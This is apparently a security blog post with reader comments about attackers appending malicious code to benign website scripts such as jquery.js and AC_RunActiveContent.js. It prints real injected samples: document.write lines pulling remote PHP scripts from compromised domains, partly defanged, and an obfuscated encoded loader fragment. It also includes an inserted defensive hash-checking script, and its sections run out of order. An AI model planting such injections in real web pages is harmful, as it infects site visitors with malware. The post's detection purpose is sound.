• When Benign scripts attack!

    Code injection attacks are constantly morphing. The bad guys are constantly looking to deposit malicious code into websites in order to infect the visitors to those sites. Once infected, the visitors' machines can become part of extremely large bot armies and can be used to propagate the cycle of code injection attacks further. The injection itself is usually done by sniffing the clear-text FTP user name and password that most people use to update their websites with new content.

    Traditionally, hackers have used obfuscated code, packed scripts and all sorts of techniques that would flummox the average Joe. Now there is an increasing focus on modifying or hacking scripts that already exist on websites.

    Most websites use scripts such as jquery.js and AC_RunActiveContent.js. These are prime candidates for getting hacked.

    What do these “benign” scripts do?

    jQuery (jquery.com) is a fast and concise JavaScript library that simplifies HTML document traversal, event handling, animation, and Ajax interactions for rapid web development.

    jQuery provides a wrapper around the core tasks of JavaScript (e.g. animation, Ajax, form validation) as straightforward interfaces which can be employed in the rest of the code, providing a scripting layout that is faster, simpler and easier to use.

    When content developers publish a Flash document associated with HTML using the “Flash Only” or “Flash HTTPS” HTML templates, a JavaScript file named AC_RunActiveContent.js, linked from the HTML file, is created automatically. This file needs to remain with the HTML file for the JavaScript-based embedding of active content. A JavaScript function called AC_FL_RunContent() dynamically generates the object and embed tags the browser needs to display your Flash movie. This function is defined within AC_RunActiveContent.js and is called at the location in your HTML file where you want your Flash movie to be displayed.

    The Hacks

    Hackers have now started to focus more on these scripts by inserting code like the samples below.

    Owners of websites and content creators should be aware of these evolving threats and be on their toes to deal with them. One way is to take SHA-1 and MD5 hashes of these benign scripts and compare them frequently. Consider this badwarebusters.com post: even until a few minutes ago, cases of similar hacks were still popping up. In that case too, a benign script was compromised with nearly the same code as the one used for the jQuery hack.
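    As an added example (not code from the original post or from StopTheHacker), the hash comparison suggested above, written as a small Python integrity check: it baselines the SHA-1/MD5 digests of every .js file under a web root, reports any that changed, and additionally scans the tail of a file for the appended document.write('<script src=...>') pattern shown in the samples on this page. The web root, the stand-in jquery.js content and the injected hostname are constructed for the demo.

```python
import hashlib
import os
import re
import tempfile

# The injection seen on this page: document.write() emitting an external <script src=...> tag
INJECT_RE = re.compile(
    r"document\.write\(\s*['\"]<script\b[^>]*\bsrc\s*=\s*['\"]?https?://", re.I)

def file_hashes(path):
    """Return (sha1, md5) hex digests of the file's contents."""
    with open(path, "rb") as f:
        data = f.read()
    return hashlib.sha1(data).hexdigest(), hashlib.md5(data).hexdigest()

def build_baseline(webroot):
    """Map each .js file (path relative to webroot) to its digests."""
    baseline = {}
    for dirpath, _, names in os.walk(webroot):
        for name in names:
            if name.lower().endswith(".js"):
                full = os.path.join(dirpath, name)
                baseline[os.path.relpath(full, webroot)] = file_hashes(full)
    return baseline

def diff_baseline(webroot, baseline):
    """Report .js files changed, added or removed since the baseline was taken."""
    now = build_baseline(webroot)
    return {"changed": sorted(p for p in baseline if p in now and now[p] != baseline[p]),
            "added": sorted(set(now) - set(baseline)),
            "removed": sorted(set(baseline) - set(now))}

def tail_injections(path, tail_bytes=4096):
    """Scan only the end of a file, where every sample on this page was appended."""
    with open(path, "rb") as f:
        f.seek(0, os.SEEK_END)
        f.seek(max(0, f.tell() - tail_bytes))
        tail = f.read().decode("utf-8", "replace")
    return [m.group(0) for m in INJECT_RE.finditer(tail)]

def demo():
    """Constructed scenario: baseline a clean jquery.js, then append an injection."""
    root = tempfile.mkdtemp()
    js = os.path.join(root, "jquery.js")
    with open(js, "w") as f:  # stand-in for the real library
        f.write("(function(){var jQuery=window.jQuery={};})();\n")
    baseline = build_baseline(root)
    with open(js, "a") as f:  # the attacker's append; hostname is a placeholder
        f.write("document.write('<script src=http://example.invalid/x.php ><\\/script>');\n")
    return diff_baseline(root, baseline), tail_injections(js)
```

    Run diff_baseline on a schedule against a baseline stored off the web server, since an attacker with the FTP credentials can overwrite a baseline kept next to the scripts.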

    Adios all, till the next in this vein of posts. And as usual, StopTheHacker is always here to help.

    Consider an example of AC_RunActiveContent.js being hacked:

      method.onMouseRight = function(event) {
        this.bubbleUp(event);
      }
    
    NOF.Flash.__proto__.ComponentsMouseListener = NOF_Flash_ComponentsMouseListener;
    }
    
    document.write('<script src=http://spielwaren-carl-loebner.de/shop/team.php ><\/script>');
    

    Now jQuery: consider code like the below, right on top of the main source.

    $a="Z6fpZ3dZ22Z2524Z2561Z253dZ2522dw(dcZ2573(cuZ252c14Z2529);Z2522;Z22;ceZ3dZ223hZ2561Z2572CodZ2565At
    (Z2530)^(Z25270Z2578Z25300Z2527+esZ2529));Z257d}Z22;cdZ3dZ22Z253dst+Z2553triZ256egZ252efZ2572Z256fmZ254
    3haZ2572CZ256fdeZ2528(Z2574mp.Z256Z22;czZ3dZ22Z2566uZ256ectZ2569onZ2520cZ257a(czZ2529Z257bretZ2575rZ256eZ
    2520ca+Z2563Z2562+cZ2563Z252bcZ2564+ceZ252bczZ253bZ257d;Z22;cbZ3dZ22pZ2565(Z2564s)Z253bstZ253dtmpZ253dZ25
    27Z2527;for(iZ253d0;iZ253cds.Z256cenZ22;stZ3dZ22Z2573Z2574Z253dZ2522$aZ253dZ2573Z2574;Z2564cZ2573Z2528dZ2
    561Z252bdZ2562+Z2564cZ252bZ2564dZ252bdZ2565,Z2531Z2530)Z253bZ2564Z2577Z2528Z2573tZ2529;Z2573Z2574Z253dZ25
    24Z2561;Z2522;Z22;dzZ3dZ22Z2566unZ2563tioZ256e dZ2577(tZ2529Z257bcaZ253dZ2527Z252564oZ252563umeZ25256etZ2
    52ewZ252572Z252569Z252574Z2565Z252528Z252522Z2527;ceZ253dZ2527Z252522Z252529Z2527;cbZ253dZ2527Z25253cscrZ
    252
    
    (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=funct
    

    Add to this the existence of tons of other scripts (live clocks and the many more that people get from Dynamic Drive and similar sites), and the scale of this relatively “silent” attack vector is very large.

    And this time right after the body of the main code:

    var ret = handler.apply(this, arguments);
    
    if( ret !== undefined ) {
    	event.result = ret;
    	if ( ret === false ) {
    		event.preventDefault();
    
    document.write('<sc ript src=hxxp://stroysauna.ru/da37d9e b94067800b6205421a826ccd0/links.php ><\/sc ript>');
    document.write('<s cript src=hxxp://stroysauna.ru/da37d9eb94067800b6205421a826ccd0/lin ks.php ><\/script>');
    document.write('<scr ipt src=hxxp://cafeimperio.ee/cache/INSTALL.php ><\/script>');
    document.write('<sc ript src=hxxp://cafeimperio.ee/cache/INSTALL.php ><\/script>');
    document.write('<sc ript src=hxxp://cafeimperio.ee/cache/INSTALL.php ><\/script>');
    document.write('<scri pt src=hxxp://cafeimperio.ee/cache/INSTALL.php ><\/script>');
    document.write('<scri pt src=hxxp://sportsdisplaycases.net/baseball/sitemap.php ><\/scri pt>');
    document.write('<scr ipt src=hxxp://sportsdisplaycases.net/baseball/sitemap.php ><\ / sc ript>');
    document.write('<sc ript src=hxxp://sportsdisplaycases.net/baseball/sitemap.php ><\/scri pt>');
    document.write('<scr ipt src=hxxp://sportsdisplaycases.net/baseball/sitemap.php ><\/scr ipt>');
    

    Here’s a really recent example:

    The malicious code present looks like below and is inserted at the end of the benign ac_runactivecontent.js script.

    default:
     ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1];
     }
     }
     ret.objAttrs["classid"] = classid;
     if (mimeType) ret.embedAttrs["type"] = mimeType;
     return ret;
    }
    
    document.write('<sc ript src=hxxp://tet asperu.pe/wordpress/video11.php ><\/script>');
    document.write('<scr ipt src=hxxp://sam poong.co.kr/admin/SMALL_UPDIR/index.php ><\/script>');
    document.write('<scri pt src=hxxp://wor phueser.de/032c0698b3108c214/032c0698b31084b13.php ><\/script>');
    document.write('<sc rip t src=hxxp://wor phueser.de/032c0698b3108c214/032c0698b31084b13.php ><\/script>');
    document.write('<scr ipt src=hxxp://wor phueser.de/032c0698b3108c214/032c0698b31084b13.php ><\/script>');
    

    And if you haven’t had your fill of it yet… here’s more:

    this[0]==l?document.compatMode=="CSS1Compat"&&document.documentElement["client"+G]||
    document.body["client"+G]:this[0]==document?Math.max(document.documentElement["client"+G],
    document.body["scroll"+G],document.documentElement["scroll"+G],document.body["offset"+G],
    document.documentElement["offset"+G]):K===g?(this.length?o.css(this[0],J):null):
    this.css(J,typeof K==="string"?K:K+"px")}})})();
    
    document.write('<s c ript src=http://lou- ferrigno.info/.smileys/sinbad.php ><\/script>');
    document.write('<scri pt src=http://lou-fe rrigno.info/.smileys/sinbad.php ><\/script>');
    document.write('<scri pt src=http://lou-fer rigno.info/.smileys/sinbad.php ><\/script>');
    document.write('<scri pt src=http://lou-ferr igno.info/.smileys/sinbad.php ><\/script>');
    document.write('<scri pt src=http://lou-ferri gno.info/.smileys/sinbad.php ><\/script>');
    document.write('<scrip t src=http://lou-ferrig no.info/.smileys/sinbad.php ><\/script>');
    document.write('<scri pt src=http://l ou-ferrign o.info/.smileys/sinbad.php ><\/script>');
    document.write('<scr ipt src=http://lo u-ferrigno.info/.smileys/sinbad.php ><\/script>');
    document.write('<script src=http://lou- ferrigno.info/.smileys/sinbad.php ><\/script>');
    document.write('<sc ript src=http://lou- ferrigno.info/.smileys/sinbad.php ><\/script>');
    document.write('<scrip t src=http://lou-f errigno.info/.smileys/sinbad.php ><\/script>');
    document.write('<scri pt src=http://lou-fe rrigno.info/.smileys/sinbad.php ><\/script>');
    document.write('<scr ipt src=http://lou-fer rigno.info/.smileys/sinbad.php ><\/script>');
    document.write('<sc ript src=http://lou-ferr igno.info/.smileys/sinbad.php ><\/script>');
    document.write('<s cript src=http://lou-ferri gno.info/.smileys/sinbad.php ><\/script>');
    document.write('<scrip t src=http://lou-ferrig no.info/.smileys/sinbad.php ><\/script>');
    document.write('<scri pt src=http://lou-ferrign o.info/.smileys/sinbad.php ><\/script>');
    document.write('<scr ipt src=http://f ici.com/promotional-wall-calendars/cal1.php ><\/script>');
    document.write('<sc ript src=http://sc hitkomplekt.ru/price/index.php ><\/script>');
    document.write('<s cript src=http://fic i.com/promotional-wall-calendars/cal1.php ><\/script>');
    document.write('<scrip t src=http://fici .com/promotional-wall-calendars/cal1.php ><\/script>');
    document.write('<scri pt src=http://kalai kaviri-offcamp.com/images/gifimg.php ><\/script>');
    document.write('<scr ipt src=http://kolons port.com.cn/images/b54/gifimgz.php ><\/script>');
    document.write('<script src=http://brandper fumes.co.uk/tips_on_how_to_wear_your_perfume_correctly/require.php ><\/script>');
    document.write('<scri pt src=http://salgoo.c om/data/_tail.php ><\/script>');
    document.write('<scr ipt src=http://thecelebr itynetwork.netfirms.com/_vti_pvt/rwpzo.php ><\/script>');
    document.write('<sc ript src=http://thecelebri tynetwork.netfirms.com/_vti_pvt/rwpzo.php ><\/script>');
    
    • I may be missing something, but your article does not make it clear how the ‘payload link’ (i.e. hxxp://spielwaren-carl -loebne r.de/shop/team.php ) can be written into the source of the site, affecting ALL visitors to the site. I understand this is a ‘persistent’ XSS attack (it has just happened to our site). Your example seems to cover only the hacker impacting on the hacker’s own security context.

      Posted by dave on November 2nd

    • You are right, this article does not focus on how the payload is injected. From my analysis of systems, the culprit is a relatively straightforward, but pervasive, trojan, which resides on the local machines used to make changes to web pages. Once the cleartext FTP password and username are sniffed, this data can be pumped in without ringing any alarm bells.

      Posted by anirban on November 2nd

    • Thanks – I can confirm this is what seemed to happen in our case. The payload was uploaded to live from a developer’s PC.

      Posted by dave on November 3rd

    • My site is also injected like these scripts, but I am not able to resolve the issue. Kindly advise me what to do.

      Posted by Kumar Abhishek on February 9th

    • @Kumar Abhishek
      Kumar, why don’t you contact us via our support form and tell us more about your issue? One of our admins will be happy to help you.

      Posted by admin on February 9th

    • […] A more detailed description of how the malware is appended is presented in one of our previous posts. […]

      Posted by osCommerce Attacks – stopthehacker.com – Jaal, LLC on November 7th